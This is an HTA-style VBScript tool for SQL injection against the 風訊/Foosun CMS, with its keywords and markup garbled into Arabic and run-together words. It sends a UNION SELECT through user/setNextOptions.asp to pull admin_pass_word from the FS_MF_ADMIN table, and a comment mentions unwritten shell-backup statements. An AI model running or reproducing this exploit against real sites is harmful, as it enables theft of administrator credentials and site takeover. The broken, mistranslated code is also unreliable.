<scriptLanguage = "vbscript">
subwindow_onload
Window.Resizeto450،380
Window.Moveto300،300
ينتهي
</script>
<scriptLanguage = "vbscript">
FunctionGethTtppage (المسار)
t = getBody (المسار)
gethtpage = bytestobstr (t ، "GB2312")
document.getElementById ("url"). innertext = gethttppage
الوظيفية
</script>
<scriptLanguage = "vbscript">
FunctionGetBody (url)
onerrorresumenext
setRetRieval = createObject ("microsoft.xmlhttp")
withretrival
.OPEN "Get" ، url ، false ، "" ، ""
.يرسل
getBody = .responseBody
endwith
setRetRieval = لا شيء
الوظيفية
FunctionByTestobstr (الجسم ، CSET)
Dimobjstream
setObjStream = createObject ("Adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.Open
objstream.writeBody
objstream.position = 0
objstream.type = 2
objstream.charset = cset
bytestobstr = objstream.readtext
objstream.close
setObjStream = لا شيء
الوظيفية
</script>
<title> bylcx </title>
<inputId = "urlCode" name = "urlCode" size = "60" value = "http: // 风讯 url/user/setNextOptions.asp">
<selectid = "sql" name = "sql" onChange = vbs: gethttppage (document.getElementById ("urlCode"). value+document.getElementById ("sql"). value)>
<PointValue = ""> 风讯 sql 版注入 , 至于其它备份 shell 的语句懒得写了 </soph>
<PointValue = "؟ equvalue = 1 & reqsql = Select ٪ 201 ، admin_pass_word ، 3،4،5،7،7،9،10،11،12،13،14،15،16،17،18،19،20،21،22،23،24،25،26،26،26،26،26 ، 28،29،30،31،32،33،34،35،36،37،38،39،40،41،42،43،44،45،46،47،48،49،50،50،51 ٪ 20FROM ٪ 20FS_MF_ADMIN ٪ 20ID ٪ 20ID = 1-")